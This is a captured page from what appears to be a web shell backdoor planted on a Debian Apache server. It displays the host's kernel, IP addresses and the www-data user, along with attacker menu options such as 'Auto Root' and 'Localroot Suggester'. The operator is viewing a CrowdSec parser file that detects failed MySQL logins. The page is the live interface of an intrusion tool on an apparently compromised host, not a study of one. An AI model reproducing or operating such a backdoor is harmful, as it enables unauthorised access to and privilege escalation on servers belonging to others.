Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
crowdsec /
parsers /
s01-parse /
Delete
Unzip
Name
Size
Permission
Date
Action
apache2-logs.yaml
3.32
KB
-rw-r--r--
2024-10-04 14:15
mysql-logs.yaml
787
B
-rw-r--r--
2024-03-12 23:06
sshd-logs.yaml
4.83
KB
-rw-r--r--
2024-10-04 14:15
Save
Rename
onsuccess: next_stage name: crowdsecurity/mysql-logs description: "Parse MySQL logs" filter: "evt.Parsed.program == 'mysql'" pattern_syntax: MYSQL_ACCESS_DENIED: "Access denied for user '%{DATA:user}'@'%{IP:source_ip}' \\(using password: %{WORD:using_password}\\)" nodes: - grok: pattern: "%{TIMESTAMP_ISO8601:time} %{NUMBER} \\[Note\\]( \\[%{DATA:err_code}\\] \\[%{DATA:subsystem}\\])? %{MYSQL_ACCESS_DENIED}" apply_on: message - grok: pattern: "%{TIMESTAMP_ISO8601:time}.*%{NUMBER} Connect.*%{MYSQL_ACCESS_DENIED}" apply_on: message statics: - meta: log_type value: mysql_failed_auth - meta: source_ip expression: "evt.Parsed.source_ip" - target: evt.StrTime expression: evt.Parsed.time - meta: user expression: "evt.Parsed.user"